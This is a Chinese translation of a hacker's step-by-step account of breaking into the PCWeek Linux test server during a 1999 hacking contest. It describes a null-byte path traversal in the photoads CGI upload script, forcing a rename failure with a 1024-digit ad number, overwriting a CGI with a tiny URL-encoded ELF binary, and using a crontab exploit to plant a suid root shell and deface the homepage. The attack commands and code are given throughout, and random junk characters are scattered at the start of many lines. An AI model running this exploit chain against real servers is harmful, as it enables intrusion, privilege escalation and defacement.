JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。

0 _" p( W, @3 L7 g1 {
' D& ^! K+ m, z: c首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
9 R! q7 M3 y( C9 z/ T- X+ K& J8 v描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
以我们只能从 HTTP 服务器着手了。
( p4 V8 z. ?* w! R
9 f1 V# x1 d, z9 `' xlemming:~# telnet securelinux.hackpcweek.com 80
3 v( _% r6 L4 ^+ m( P: |Trying 208.184.64.170...
' Z+ k( g% f$ c) q6 ?* x2 r! vConnected to securelinux.hackpcweek.com.
# W4 Z, h6 H. G* z  Y2 v8 q/ }/ AEscape character is '^]'.
POST X HTTP/1.0

HTTP/1.1 400 Bad Request
" O4 X' s; a" e+ a* @6 rDate: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
3 B0 D3 j+ d( o  a(...)
Connection closed by foreign host.
lemming:~#
4 W' x) d2 @8 Y3 j4 e# t7 c
嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
! K7 ]' j1 I6 M1 h# y1 f( z# ^5 b装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
7 s  c0 O3 S$ ^5 ~/ N3 l! ?Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
6 _- m) t' n$ V( u  _& e的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
  k) Z) Y0 v6 x了网站DocumentRoot下的目录结构：

/
* ]9 G6 P( E5 Q8 J/cgi-bin
/photoads/
/photoads/cgi-bin

: r6 k8 K7 F3 M2 c' j6 r很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
6 {9 F# S: i# X% J( b. x5 x& `' @www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
运行在该主机上的 photoads。
9 D- [1 I3 O" q3 P7 n( `检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
securelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
: B2 E& N: C) \5 D8 o/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
DocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
nobody）等。
' s/ C1 R( ]6 B1 T现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
命令的漏洞，如：

* u) e* G3 v6 o8 j  n# f) d<!--#include file="..."--> for SSI
( ^! m6 Z0 }! t# C3 |% Y<!--#perl ...--> for mod_perl

但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
8 H! M1 o) V) {9 n4 l令嵌入到由服务器端解析的 HTML 代码中：

3 b5 E# M- j1 a; x% z在 post.cgi，行 36：
6 s8 C% Q8 c1 f6 `print "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
1 h, K0 P9 _3 {' t' e+ W! F
/ {2 e% R/ H. a  q* }! Q, ~$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：

' H  h7 R/ s, u; L' e. f0 Klemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。
2 K' x8 @1 l. w6 F
+ k7 y1 I' O3 }4 A4 G因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：
  T9 V( t4 D1 F3 v" {2 W' C
8 \8 D/ [) S1 q/ qlemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
+ f, r, [2 z3 g5 |5 b# P" E(...)
5 M2 R& m/ M5 W
$ q, T/ F- h/ K* w- o$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
我们利用。
但其余两个就……
9 \/ b% w' x* t( c% p2 `
在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;

! n# H2 f5 Q/ M* d$ `& I: oopen(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
print ULFD $UPLOAD{'FILE_CONTENT'};
. E. F" F& {% r8 z) t8 ~3 Mclose(ULFD);

, f$ B& ?: `7 _6 \8 w# Y因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
$write_file 变量来自：
) Q8 A- i( v) @0 N" Q' _
$write_file = $Upload_Dir.$filename;
0 |) n5 E5 I; N
; L$ R2 G$ X5 x" k3 M9 _) b0 }( G其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？
  k$ f' n- Q5 m4 ?( q# Q
; p5 {1 u6 z5 i6 Q在 photo.cgi，行 226：
/ z# e3 v* [: w3 p- @5 tif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
- T- E9 M7 m1 g# `( `  x# Z
$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
$ z1 V& u) o4 m) |
if ($filename =~ m/gif/) {
$type = '.gif';
}elsif ($filename =~ m/jpg/) {
2 @; l$ [6 N7 v4 s1 E$type = '.jpg';
}else{
) w5 \- _: T: i{&Not_Valid_Image}
}
+ Y6 W' \& E; J1 `. c3 S
由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
& m! M' \& D1 B& z须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
得任何文件。匹配表达式为：

4 ?* G8 f) s& H0 L1 w$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

- g$ ?8 ^$ ?) r我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
+ d. ~3 c; T) h须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
- [: ?8 E6 T& O; {5 G1 ^- Q( H, k经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式

/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
0 b0 r7 ~3 G* Y( P1 S包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
. \2 c" K* Y4 f8 [2 S6 K+ y在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
5 i. G9 d& E) F+ y; e, f) W（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
而将主要精力集中在GIF上。

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
close FILE;
$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
return;
% V$ o) `* o5 n% t' i& A}
# p5 y. J' ]% ]5 E
8 E& X: x" x: P  n4 n  ]. ^0 h在 photo.cgi，行 140：
3 B  P  m; r% O) p$ {( H2 ?- O
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}

2 N% P, {# d& M8 d9 uif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
) P2 r# M! m6 }{&Height_Width}
}

# i$ U: d2 C+ z$ ~! Q由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
, P, f6 f. _# h; b。
* u1 n4 @0 ~7 [" }8 O" z- ?7 D' Q! I) K所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
& _$ t( x& E/ _, i* t6 m（NUL）。
在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
个问题：

chmod 0755, $Upload_Dir.$filename;
8 E0 W! Q" M0 C% [: \; q" v$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
; j& e) ^% {3 L) c! Q
/ A) ^0 T9 R/ M* {% A9 l5 IShow_Upload_Success($write_file);
3 _& u  X9 M6 d: J8 W' d
哇！文件将被改名/移动（这可是我们绝对不希望的！）。
( Y/ I% O! x) O3 J0 S查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：

$UPLOAD{'AdNum'} =~ tr/0-9//cd;
9 L/ ^' v3 K% H$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
7 n% R  `1 W+ F$AdNum = $UPLOAD{'AdNum'};
) A) j8 }! ]" `
' P1 |* E: h5 a9 x+ ]其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
  f% u( E& Z1 z; X0 Q1 L那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
& d4 Y& t# C% Z( Z: [# g) m0 I/ L哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
" e, ~' f. d0 @6 S6 f6 H文件名超过1024字节长，即可绕过这个过滤器。
+ J/ e* E+ [# A1 o' e. ?$ w所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
9 g- `: d( t4 f; Z' I我们又遇到另一个难题了！……

我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
" `; t- H1 e. _" U4 c呢？;-)
3 s6 B$ ]# I. L6 P请阅读用于创建新AD值的程序文件 long.adnum。
7 N$ N. k$ E$ t% ]7 X/ T' U当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
5 f1 ]  u( m: w& T文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。
; p/ y- J2 H# Q0 F0 h& E/ c- Q
现在就让我们对该主机试一试这个方法。
$ o' P1 X. j- A; q3 j  o. |嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
; Z6 W+ `1 }5 ^! M' v

让我们试一下是否还有其它入侵方法……
& \' N4 P" p: z( U/ S# c' E$ [
0 N: k% C4 _7 |1 i7 M! V: l我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
& L% X/ ~# f+ e, l, d些“绝密”文件，然后拿出动卖。:)
0 ^1 `0 H. I" `9 Z我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
道它有什么用吗？:)）
  C- N( z4 ~+ P# I现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
6 M$ P3 G: ]; j1 `2 O3 v# w然而，这个以CGI方式运行的shell脚本必须符合以下格式：

#!/bin/sh
! l. ], N+ |0 r$ o, U$ Pecho "Content-type: text/html"
  }8 K* p0 r0 B, K9 O+ Ffind / "*secret*" -print
- F* s8 Z. o' J8 N
) q, C7 q8 z( I同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……

#!/bi\00\00\00\00n/sh
) i! K  x% P+ n$ B  W
6 T/ {5 j1 U6 }- F/ D! W4 u以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(

让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
内容均为0x00。:) Yohoo :)
- \; ?. H- s8 g+ D8 J+ N- R: @解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
  ~2 C2 _" Q% s; ?% N/ W$ mURI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。
2 b' |( L% q" w# A$ O
以下这个程序：
  {7 ]& q& c6 D( v& B* k9 I7 U1 X
( p- _  h" N* @7 b: {# I2 Llemming:~/pcweek/hack/POST# cat fin.c
8 U0 Q: j8 B) `7 [! U#include <stdio.h>
main()
/ ~' `) g: z" O7 O* l1 q{
printf("Content-type: text/html\n\n\r");
% z5 ?( d5 \8 F, K' Ufflush(stdout);
- |" G5 s5 L1 Z; ~execlp("/usr/bin/find","find","/",0);
}
8 _" A" W+ }8 X) A% M' W5 O7 g
9 \9 f; |0 c& u编译后：
" b* Z  Y, W1 o/ i* V
; U2 s- S4 b; L" P, R3 L" Nlemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
3 g3 Z) b- r' E0 Y5 j: Q
优化（清除symbols）后：

lemming:~/pcweek/hack/POST# strip fin
# g' S% b" L& @/ s8 x1 xlemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
" Y5 I; i5 k: S" E, X7 I. l# _5 qlemming:~/pcweek/hack/POST#

" q4 e7 C9 K: w1 h% xURL编码后：

1 X( L; j: b: J7 J' q9 c$ Clemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
2 W% [3 f- k& d  T0 Ylemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url
+ V! _3 z) C2 M% U. d$ S
$ C1 \- P* S; N3 e: `( G+ G这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：

lemming:~/pcweek/hack/POST# joe fin
- p; u* T3 |  z% b4 |lemming:~/pcweek/hack/POST# ls -l fin
+ ?, @5 G& ?% Z/ ?6 e-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
lemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
" {. u' N) J, X, P5 z2 l  b. @lemming:~/pcweek/hack/POST# ls -l fin.url
9 j9 W3 U* [$ P) y: X-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#
# Z5 R4 j7 b+ Z( p
请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。

现在，将这个CGI上载到服务器，再用浏览器访问它，如：

wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
4 O2 @7 Q! g& f
7 k+ K- Q& A5 j/ C% _服务器返回的结果相当于在服务器上执行 find / 命令。:)
- {. o0 N- ^4 J- Z, H9 M% K5 C% V但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]


好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
6 k5 [# `4 M6 `4 m* ?( N轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
% T. \0 ~9 h% C我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
观察其运行结果。
2 t' W6 |& u, N9 l9 @我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。
, P0 Y8 G; P4 A- D1 E7 P& c
. {( \6 J# N" H+ V  X. ^, q& Aexeclp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);

' ^$ H/ `% q) v2 u- o- R% q好了。游戏结束！:)
4 `3 u' `2 l: X0 \总共花费了大约20个小时，还算不错！呵呵。:)